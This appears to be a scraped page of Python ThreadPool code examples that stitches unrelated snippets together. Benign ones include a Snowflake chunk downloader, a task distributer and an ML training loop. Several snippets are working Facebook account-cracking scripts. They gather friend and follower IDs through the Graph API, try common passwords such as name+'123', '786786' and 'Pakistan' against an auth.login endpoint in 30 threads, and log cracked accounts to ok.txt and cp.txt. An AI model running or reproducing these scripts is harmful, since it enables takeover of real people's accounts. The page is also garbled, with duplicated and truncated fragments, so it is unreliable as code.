                print '[Checkpoint] ' + uid + ' | ' + pass1
                cp = open('cp.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid + pass1)
            else:
                pass2 = name + '1234'
                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                    print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass2 + '\x1b[0;97m'
                    ok = open('ok.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid + pass2)
                elif 'www.facebook.com' in q['error']:
                    print '[Checkpoint] ' + uid + ' | ' + pass2
                    cp = open('cp.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid + pass2)
                else:
                    pass3 = name + '12345'
                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                        print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass3 + '\x1b[0;97m'
                        ok = open('ok.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid + pass3)
                    elif 'www.facebook.com' in q['error']:
                        print '[Checkpoint] ' + uid + ' | ' + pass3
                        cp = open('cp.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid + pass3)
                    else:
                        pass4 = name + '786'
                        data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                            print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass4 + '\x1b[0;97m'
                            ok = open('ok.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid + pass4)
                        elif 'www.facebook.com' in q['error']:
                            print '[Checkpoint] ' + uid + ' | ' + pass4
                            cp = open('cp.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.apppend(uid + pass4)
                        else:
                            pass5 = '786786'
                            data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                                print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass5 + '\x1b[0;97m'
                                ok = open('ok.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid + pass5)
                            elif 'www.facebook.com' in q['error']:
                                print '[Checkpoint] ' + uid + ' | ' + pass5
                                cp = open('cp.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid + pass5)
                            else:
                                pass6 = '786000'
                                data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                                    print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass6 + '\x1b[0;97m'
                                    ok = open('ok.txt', 'a')
                                    ok.write(uid + ' | ' + pass6 + '\n')
                                    ok.close()
                                    oks.append(uid + pass6)
                                elif 'www.facebook.com' in q['error']:
                                    print '[Checkpoint] ' + uid + ' | ' + pass6
                                    cp = open('cp.txt', 'a')
                                    cp.write(uid + ' | ' + pass6 + '\n')
                                    cp.close()
                                    cps.append(uid + pass6)
                                else:
                                    pass7 = 'Pakistan'
                                    data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass='******'loc' in q:
                                        print '\x1b[1;32m[Successful] \x1b[1;30m' + uid + ' | ' + pass7 + '\x1b[0;97m'
                                        ok = open('ok.txt', 'a')
                                        ok.write(uid + ' | ' + pass7 + '\n')
                                        ok.close()
                                        oks.append(uid + pass7)
                                    elif 'www.facebook.com' in q['error']:
                                        print '[Checkpoint] ' + uid + ' | ' + pass7
                                        cp = open('cp.txt', 'a')
                                        cp.write(uid + ' | ' + pass7 + '\n')
                                        cp.close()
                                        cps.append(uid + pass7)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ''
    print 47 * '-'
    print ''
    print ' The process has completed'
    print ' Total Ok/Cp :' + str(len(oks)) + '/' + str(len(cps))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press entet to back ')
    l_menu()
class SnowflakeChunkDownloader(object):
    u"""
    Large Result set chunk downloader class.
    """
    def _pre_init(self,
                  chunks,
                  connection,
                  cursor,
                  qrmk,
                  chunk_headers,
                  query_result_format='JSON',
                  prefetch_threads=DEFAULT_CLIENT_PREFETCH_THREADS,
                  use_ijson=False):
        self._use_ijson = use_ijson
        self._query_result_format = query_result_format

        self._downloader_error = None

        self._connection = connection
        self._cursor = cursor
        self._qrmk = qrmk
        self._chunk_headers = chunk_headers

        self._chunk_size = len(chunks)
        self._chunks = {}
        self._chunk_cond = Condition()

        self._effective_threads = min(prefetch_threads, self._chunk_size)
        if self._effective_threads < 1:
            self._effective_threads = 1

        for idx, chunk in enumerate(chunks):
            logger.debug(u"queued chunk %d: rowCount=%s", idx,
                         chunk[u'rowCount'])
            self._chunks[idx] = SnowflakeChunk(url=chunk[u'url'],
                                               result_data=None,
                                               ready=False,
                                               row_count=int(
                                                   chunk[u'rowCount']))

        logger.debug(
            u'prefetch threads: %s, '
            u'number of chunks: %s, '
            u'effective threads: %s', prefetch_threads, self._chunk_size,
            self._effective_threads)

        self._pool = ThreadPool(self._effective_threads)

        self._downloading_chunks_lock = Lock()
        self._total_millis_downloading_chunks = 0
        self._total_millis_parsing_chunks = 0

        self._next_chunk_to_consume = 0

    def __init__(self,
                 chunks,
                 connection,
                 cursor,
                 qrmk,
                 chunk_headers,
                 query_result_format='JSON',
                 prefetch_threads=DEFAULT_CLIENT_PREFETCH_THREADS,
                 use_ijson=False):
        self._pre_init(chunks,
                       connection,
                       cursor,
                       qrmk,
                       chunk_headers,
                       query_result_format=query_result_format,
                       prefetch_threads=prefetch_threads,
                       use_ijson=use_ijson)
        logger.debug('Chunk Downloader in memory')
        for idx in range(self._effective_threads):
            self._pool.apply_async(self._download_chunk, [idx])
        self._next_chunk_to_download = self._effective_threads

    def _download_chunk(self, idx):
        """
        Downloads a chunk asynchronously
        """
        logger.debug(u'downloading chunk %s/%s', idx + 1, self._chunk_size)
        headers = {}
        try:
            if self._chunk_headers is not None:
                headers = self._chunk_headers
                logger.debug(u'use chunk headers from result')
            elif self._qrmk is not None:
                headers[SSE_C_ALGORITHM] = SSE_C_AES
                headers[SSE_C_KEY] = self._qrmk

            logger.debug(u"started getting the result set %s: %s", idx + 1,
                         self._chunks[idx].url)
            result_data = self._fetch_chunk(self._chunks[idx].url, headers)
            logger.debug(u"finished getting the result set %s: %s", idx + 1,
                         self._chunks[idx].url)

            if isinstance(result_data, ResultIterWithTimings):
                metrics = result_data.get_timings()
                with self._downloading_chunks_lock:
                    self._total_millis_downloading_chunks += metrics[
                        ResultIterWithTimings.DOWNLOAD]
                    self._total_millis_parsing_chunks += metrics[
                        ResultIterWithTimings.PARSE]

            with self._chunk_cond:
                self._chunks[idx] = self._chunks[idx]._replace(
                    result_data=result_data, ready=True)
                self._chunk_cond.notify_all()
                logger.debug(u'added chunk %s/%s to a chunk list.', idx + 1,
                             self._chunk_size)
        except Exception as e:
            logger.exception(
                u'Failed to fetch the large result set chunk %s/%s', idx + 1,
                self._chunk_size)
            self._downloader_error = e

    def next_chunk(self):
        """
        Gets the next chunk if ready
        """
        logger.debug(
            u'next_chunk_to_consume={next_chunk_to_consume}, '
            u'next_chunk_to_download={next_chunk_to_download}, '
            u'total_chunks={total_chunks}'.format(
                next_chunk_to_consume=self._next_chunk_to_consume + 1,
                next_chunk_to_download=self._next_chunk_to_download + 1,
                total_chunks=self._chunk_size))
        if self._next_chunk_to_consume > 0:
            # clean up the previously fetched data
            n = self._next_chunk_to_consume - 1
            self._chunks[n] = self._chunks[n]._replace(result_data=None,
                                                       ready=False)

            if self._next_chunk_to_download < self._chunk_size:
                self._pool.apply_async(self._download_chunk,
                                       [self._next_chunk_to_download])
                self._next_chunk_to_download += 1

        if self._downloader_error is not None:
            raise self._downloader_error

        for attempt in range(MAX_RETRY_DOWNLOAD):
            logger.debug(
                u'waiting for chunk %s/%s'
                u' in %s/%s download attempt', self._next_chunk_to_consume + 1,
                self._chunk_size, attempt + 1, MAX_RETRY_DOWNLOAD)
            done = False
            for wait_counter in range(MAX_WAIT):
                with self._chunk_cond:
                    if self._downloader_error:
                        raise self._downloader_error
                    if self._chunks[self._next_chunk_to_consume].ready:
                        done = True
                        break
                    logger.debug(
                        u'chunk %s/%s is NOT ready to consume'
                        u' in %s/%s(s)', self._next_chunk_to_consume + 1,
                        self._chunk_size,
                        (wait_counter + 1) * WAIT_TIME_IN_SECONDS,
                        MAX_WAIT * WAIT_TIME_IN_SECONDS)
                    self._chunk_cond.wait(WAIT_TIME_IN_SECONDS)
            else:
                logger.debug(
                    u'chunk %s/%s is still NOT ready. Restarting chunk '
                    u'downloader threads', self._next_chunk_to_consume + 1,
                    self._chunk_size)
                self._pool.terminate()  # terminate the thread pool
                self._pool = ThreadPool(self._effective_threads)
                for idx0 in range(self._effective_threads):
                    idx = idx0 + self._next_chunk_to_consume
                    self._pool.apply_async(self._download_chunk, [idx])
            if done:
                break
        else:
            Error.errorhandler_wrapper(
                self._connection, self._cursor, OperationalError, {
                    u'msg': u'The result set chunk download fails or hang for '
                    u'unknown reason.',
                    u'errno': ER_CHUNK_DOWNLOAD_FAILED
                })
        logger.debug(u'chunk %s/%s is ready to consume',
                     self._next_chunk_to_consume + 1, self._chunk_size)

        ret = self._chunks[self._next_chunk_to_consume]
        self._next_chunk_to_consume += 1
        return ret

    def terminate(self):
        """
        Terminates downloading the chunks.
        """
        if hasattr(self, u'_pool') and self._pool is not None:
            self._pool.close()
            self._pool.join()
            self._pool = None

    def __del__(self):
        try:
            self.terminate()
        except:
            # ignore all errors in the destructor
            pass

    def _fetch_chunk(self, url, headers):
        """
        Fetch the chunk from S3.
        """
        handler = JsonBinaryHandler(is_raw_binary_iterator=True,
                                    use_ijson=self._use_ijson) \
            if self._query_result_format == 'json' else \
            ArrowBinaryHandler(self._cursor, self._connection)

        return self._connection.rest.fetch(u'get',
                                           url,
                                           headers,
                                           timeout=DEFAULT_REQUEST_TIMEOUT,
                                           is_raw_binary=True,
                                           binary_data_handler=handler)
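next_chunk above blocks on a threading.Condition until a background worker marks the wanted slot ready. A minimal sketch of that wait/notify handshake, with a sleep standing in for the chunk download:

import threading
import time
from multiprocessing.pool import ThreadPool

results = {}
cond = threading.Condition()

def produce(idx):
    time.sleep(0.05)                 # stand-in for fetching a chunk
    with cond:
        results[idx] = "chunk-%d" % idx
        cond.notify_all()            # wake any consumer waiting for this slot

pool = ThreadPool(2)
for i in range(4):
    pool.apply_async(produce, [i])

for i in range(4):                   # consume strictly in order
    with cond:
        while i not in results:
            cond.wait(1)
    print(results[i])

pool.close()
pool.join()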
Example #33
def pb():
	bp=raw_input(W + ' ✬🄵🄰🄲🄴🄱🄾🄾🄺✬   ')
	if bp =='':
		print (R + 'Select a valid option !')
		pb()
	elif bp =='1':
		cb()
		print (logo)
		r=requests.get('https://graph.facebook.com/me/friends?access_token='+tb)
		z=json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif bp=='2':
		cb()
		print (logo)
		idt=raw_input(S + '[☆] ' + G + 'Put Public User ID/User Name: ' + W + '')
		cb()
		print (logo)
		try:
			jok=requests.get('https://graph.facebook.com/'+idt+'?access_token='+tb)
			op=json.loads(jok.text)
			psb(S + '[☆]' + G + ' Account  Name: ' + W + op['name'])
		except KeyError:
			print (R + ' ID not found !')
			raw_input(R + ' Back')
			pak()
		r=requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+tb)
		z=json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif bp =='3':
		cb()
		print (logo)
		try:
			idlist=raw_input(S + '[☆] ' + R + 'Enter File Path: ' + G + '')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print (R + ' File Not Fount !')
			raw_input(R + ' Back')
			pak()
	elif bp =='0':
		menu()
	else:
		print (R + ' Select a valid option !')
		pb()
	print (S + '[☆]' + P + ' Total Friends: ' + W + str(len(id)))
	psb(S + '[☆]' + S + ' To stop process  click on CTRL ~ Z')
	print
	print (S + 50*'-')
	print
	def main(arg):
		global cps, oks
		user=arg
		try:
			h=requests.get('https://graph.facebook.com/'+user+'/?access_token='+tb)
			j=json.loads(h.text)
			ps1=('786786')
			dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			k=json.load(dt)
			if 'www.facebook.com' in k['error_msg']:
			    print(S+'[CP] ♡ '+user+' ♡ '+ps1)
			    cps.append(user+ps1)
			else:
			    if 'access_token' in k:
			        print (G+'[OK] ♡ '+user+' ♡ '+ps1)
			        oks.append(user+ps1)
			    else:
			        ps2=(j['first_name']+'123')
			        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			        k=json.load(dt)
			        if 'www.facebook.com' in k['error_msg']:
			            print(S+'[CP] ♡ '+user+' ♡ '+ps2)
			            cps.append(user+ps2)
			        else:
			            if 'access_token' in k:
			                print(G+'[OK] ♡ '+user+' ♡ '+ps2)
			                oks.append(user+ps2)
			            else:
			                ps3=(j['first_name']+'786')
			                dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                k=json.load(dt)
			                if 'www.facebook.com' in k['error_msg']:
			                    print(S+'[CP] ♡ '+user+' ♡ '+ps3)
			                    cps.append(user+ps3)
			                else:
			                    if 'access_token' in k:
			                        print(G+'[OK] ♡ '+user+' ♡ '+ps3)
			                        oks.append(user+ps3)
			                    else:
			                        ps4=(j['first_name']+'12345')
			                        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                        k=json.load(dt)
			                        if 'www.facebook.com' in k['error_msg']:
			                            print(S+'[CP] ♡ '+user+' ♡ '+ps4)
			                            cps.append(user+ps4)
			                        else:
			                            if 'access_token' in k:
			                                print(G+'[OK] ♡ '+user+' ♡ '+ps4)
			                                oks.append(user+ps4)
			                            else:
			                                ps5=('Pakistan')
			                                dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                                k=json.load(dt)
			                                if 'www.facebook.com' in k['error_msg']:
			                                    print(S+'[CP] ♡ '+user+' ♡ '+ps5)
			                                    cps.append(user+ps5)
			                                else:
			                                    if 'access_token' in k:
			                                        print(G+'[OK] ♡ '+user+' ♡ '+ps5)
			                                        oks.append(user+ps5)
			                                    else:
			                                        ps6=(j['first_name']+'khan')
			                                        dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='******'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
			                                        k=json.load(dt)
			                                        if 'www.facebook.com' in k['error_msg']:
			                                            print(S+'[CP] ♡ '+user+' ♡ '+ps6)
			                                            cps.append(user+ps6)
			                                        else:
			                                            if 'access_token' in k:
			                                                print(G+'[OK] ♡ '+user+' ♡ '+ps6)
			                                                oks.append(user+ps6)
		except:
			pass
	p=ThreadPool(30)
	p.map(main, id)
	print
	print(S+50*'-')
	print
	print(S+'Process has been completed CP ID Open After 7 Days ')
	print(Y+'Total '+G+'OK'+S+'/'+P+'CP'+S+' = '+G+str(len(oks))+S+'/'+R+str(len(cps)))
	print(S+'BlackMafia')     
	print
	raw_input(R + 'Back')
	os.system('python2 AH.py')
Exemple #34
 def multi_thread_parse(callback, urls):
     pool = ThreadPool(THREAD_POOL_SIZE)
     results = pool.map(callback, urls)
     return results
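 # Usage sketch (not from the original source): any single-argument callable can
 # serve as the callback. THREAD_POOL_SIZE is assumed to be a module-level
 # constant; `parse_length` below is a hypothetical stand-in for a real parser.
 def parse_length(url):
     return len(url)                      # stand-in for fetching and parsing `url`

 lengths = multi_thread_parse(parse_length, ['https://example.com', 'https://example.org'])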
Exemple #35
class Distributer(object):
    def __init__(self, kind, chunkSize=20):
        self.kind = kind
        self.chunk_size = chunkSize

    def distribute(self, function, function_kwargs, iterable, starmap=False, skip_if_error=True, max_attempts=3):
        if self.kind == 'thread':
            self.pool = ThreadPool(self.chunk_size)
        else:
            raise NotImplementedError("only kind='thread' is supported")

        if isinstance(self.pool, ThreadPool):
            for chunk in chunks(iterable, self.chunk_size):
                attempts = 0
                individually = False

                while attempts < max_attempts:
                    try:
                        if not individually:
                            if starmap:
                                ret = self.pool.starmap(function, chunk)
                            else:
                                ret = self.pool.map(partial(function, **function_kwargs), chunk)
                            attempts = max_attempts
                        else:
                            ret = []
                            for item in chunk:
                                try:
                                    if starmap:
                                        val = function(*item)
                                    else:
                                        val = partial(function, **function_kwargs)(item)
                                    ret.append(val)

                                except Exception as e:
                                    log.critical(e)
                                    log.critical(''.join(traceback.format_exception(None, e, e.__traceback__)))
                                    attempts += 1
                                    if attempts >= max_attempts:
                                        if skip_if_error:
                                            ret.append(pd.DataFrame())
                                        else:
                                            raise e

                    except Exception as e:
                        log.error(e)
                        attempts += 1
                        if attempts >= max_attempts:
                            individually = True
                            attempts = 0

                for i, item in enumerate(ret):
                    yield (chunk[i], item)

        else:
            raise NotImplementedError

        # multiprocessing's ThreadPool exposes close()/join(), not stop()
        self.pool.close()
        self.pool.join()

    def stop(self):
        self.pool.terminate()

    @staticmethod
    def default():
        return Distributer('thread')
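# Hedged usage sketch (not from the original source): `square` is a hypothetical
# worker function; distribute() yields (input, result) pairs chunk by chunk and
# forwards function_kwargs to every call. The module's own `chunks` helper, `log`
# and `pd` are assumed to be importable, as in the class above.
def square(x, offset=0):
    return x * x + offset

dist = Distributer.default()
for item, result in dist.distribute(square, {'offset': 1}, list(range(50))):
    print('%s -> %s' % (item, result))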
Exemple #36
    utils = Utilities(nParticles)
    #history = Histories()
    #history.set_up_config(config=config)
    #history.on_train_begin()
    # Build the first training dataset
    print("TRAIN_DATA: ", TRAIN_DATA)
    X_train, Y, W_train, MVA_train = utils.BuildBatch(indir=TRAIN_DATA,
                                                      nEvents=50,
                                                      nFiles=10)

    model = loader.load_multiclass(
        ouput_class=4,
        loss='categorical_crossentropy')  #,weights=class_weight)

    for epoch in range(1000):
        pool_local = ThreadPool(processes=1)
        # Shuffle loaded datasets and begin
        # use an index array: a range object cannot be shuffled in place
        inds = np.arange(len(X_train))
        np.random.shuffle(inds)
        X_epoch, Y_epoch, W_epoch, MVA_epoch = X_train[inds], Y[inds], W_train[
            inds], MVA_train[inds]
        # Check that nothing strange happened in the loaded dataset
        # (equality against np.nan is always False, so use isnan/isinf instead)
        if np.isnan(W_train).any(): continue
        if np.isinf(W_train).any(): continue
        cwd = {0: 1, 1: 1, 2: 1, 3: 1}  #dict()
        ##Save the validation:
        ## Get class weights:
        Y = MVA_epoch[:, 2:]
        y = np.argmax(Y, axis=1)
        _class_weight = class_weight.compute_class_weight(
            "balanced", [0, 1, 2, 3], y)
Exemple #37
def b_menu_select():
    select = raw_input('\t  \x1b[1;35mChoose Option >>>  \x1b[0;97m')
    id = []
    oks = []
    cps = []
    if select == '1':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Public ID Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user :  '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Public ID Cloning " | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\nPress enter to back ')
            b_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '2':
        os.system('clear')
        logo()
        print ''
        os.system('echo -e "\t    Followers Cloning " | lolcat')
        print ''
        idt = raw_input(' Put Id/user : '******'clear')
        logo()
        print ''
        os.system('echo -e "\t    Gathering Information " | lolcat')
        print ''
        try:
            r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token, headers=header)
            q = json.loads(r.text)
            os.system('clear')
            logo()
            print ''
            os.system('echo -e "\t    Followers Cloning" | lolcat')
            print ''
            print ' Target user : '******'name']
        except (KeyError, IOError):
            print ''
            print '\n\t    \x1b[1;31m Logged in id has checkpoint\x1b[0;97m'
            print ''
            raw_input('\nPress enter to back ')
            b_menu()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=5000', headers=header)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif select == '3':
        view_token()
    elif select == '4':
        extract_dob()
    elif select == '5':
        method_menu()
    elif select == '6':
        logout()
    else:
        print ''
        print '\t    ' + c + 'Select valid method' + c2
        print ''
        b_menu_select()
    print ' Total IDs : ' + str(len(id))
    time.sleep(0.5)
    print ' The process is running in background'
    print ''
    print 47 * '-'
    print ''

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            pass1 = name + '123'
            q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
            d = json.loads(q)
            if 'www.facebook.com' in d['error_msg']:
                print '[Checkpoint] ' + uid + ' | ' + pass1
                cp = open('cp.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid)
            elif 'access_token' in d:
                print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass1 + '\x1b[1;0m'
                ok = open('ok.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid)
            else:
                pass2 = name + '1234'
                q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                d = json.loads(q)
                if 'www.facebook.com' in d['error_msg']:
                    print '[Checkpoint] ' + uid + ' | ' + pass2
                    cp = open('cp.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid)
                elif 'access_token' in d:
                    print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass2 + '\x1b[1;0m'
                    ok = open('ok.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid)
                else:
                    pass3 = name + '12345'
                    q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                    d = json.loads(q)
                    if 'www.facebook.com' in d['error_msg']:
                        print '[Checkpoint] ' + uid + ' | ' + pass3
                        cp = open('cp.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid)
                    elif 'access_token' in d:
                        print ' \x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass3 + '\x1b[1;0m'
                        ok = open('ok.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid)
                    else:
                        pass4 = name + '786'
                        q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                        d = json.loads(q)
                        if 'www.facebook.com' in d['error_msg']:
                            print '[Checkpoint] ' + uid + ' | ' + pass4
                            cp = open('cp.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.append(uid)
                        elif 'access_token' in d:
                            print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass4 + '\x1b[1;0m'
                            ok = open('ok.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid)
                        else:
                            pass5 = '786786'
                            q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                            d = json.loads(q)
                            if 'www.facebook.com' in d['error_msg']:
                                print '[Checkpoint] ' + uid + ' | ' + pass5
                                cp = open('cp.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid)
                            elif 'access_token' in d:
                                print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass5 + '\x1b[1;0m'
                                ok = open('ok.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid)
                            else:
                                pass6 = '000786'
                                q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                                d = json.loads(q)
                                if 'www.facebook.com' in d['error_msg']:
                                    print '[Checkpoint] ' + uid + ' | ' + pass6
                                    cp = open('cp.txt', 'a')
                                    cp.write(uid + ' | ' + pass6 + '\n')
                                    cp.close()
                                    cps.append(uid)
                                elif 'access_token' in d:
                                    print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass6 + '\x1b[1;0m'
                                    ok = open('ok.txt', 'a')
                                    ok.write(uid + ' | ' + pass6 + '\n')
                                    ok.close()
                                    oks.append(uid)
                                else:
                                    pass7 = 'pakistan'
                                    q = requests.get('https://mbasic.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + uid + '&locale=vi_vn&password='******'&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c', headers=header).text
                                    d = json.loads(q)
                                    if 'www.facebook.com' in d['error_msg']:
                                        print '[Checkpoint] ' + uid + ' | ' + pass7
                                        cp = open('cp.txt', 'a')
                                        cp.write(uid + ' | ' + pass7 + '\n')
                                        cp.close()
                                        cps.append(uid)
                                    elif 'access_token' in d:
                                        print '\x1b[1;92m[Successfull] \x1b[1;30m' + uid + ' | ' + pass7 + '\x1b[1;0m'
                                        ok = open('ok.txt', 'a')
                                        ok.write(uid + ' | ' + pass7 + '\n')
                                        ok.close()
                                        oks.append(uid)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print ' '
    print 47 * '-'
    print ''
    print ' Process has completed'
    print ' Total Cp/Ok : ' + str(len(cps)) + '/' + str(len(oks))
    print ''
    print 47 * '-'
    print ''
    raw_input(' Press enter to back ')
    b_menu()
    def next_chunk(self):
        """
        Gets the next chunk if ready
        """
        logger.debug(
            u'next_chunk_to_consume={next_chunk_to_consume}, '
            u'next_chunk_to_download={next_chunk_to_download}, '
            u'total_chunks={total_chunks}'.format(
                next_chunk_to_consume=self._next_chunk_to_consume + 1,
                next_chunk_to_download=self._next_chunk_to_download + 1,
                total_chunks=self._chunk_size))
        if self._next_chunk_to_consume > 0:
            # clean up the previously fetched data
            n = self._next_chunk_to_consume - 1
            self._chunks[n] = self._chunks[n]._replace(result_data=None,
                                                       ready=False)

            if self._next_chunk_to_download < self._chunk_size:
                self._pool.apply_async(self._download_chunk,
                                       [self._next_chunk_to_download])
                self._next_chunk_to_download += 1

        if self._downloader_error is not None:
            raise self._downloader_error

        for attempt in range(MAX_RETRY_DOWNLOAD):
            logger.debug(
                u'waiting for chunk %s/%s'
                u' in %s/%s download attempt', self._next_chunk_to_consume + 1,
                self._chunk_size, attempt + 1, MAX_RETRY_DOWNLOAD)
            done = False
            for wait_counter in range(MAX_WAIT):
                with self._chunk_cond:
                    if self._downloader_error:
                        raise self._downloader_error
                    if self._chunks[self._next_chunk_to_consume].ready:
                        done = True
                        break
                    logger.debug(
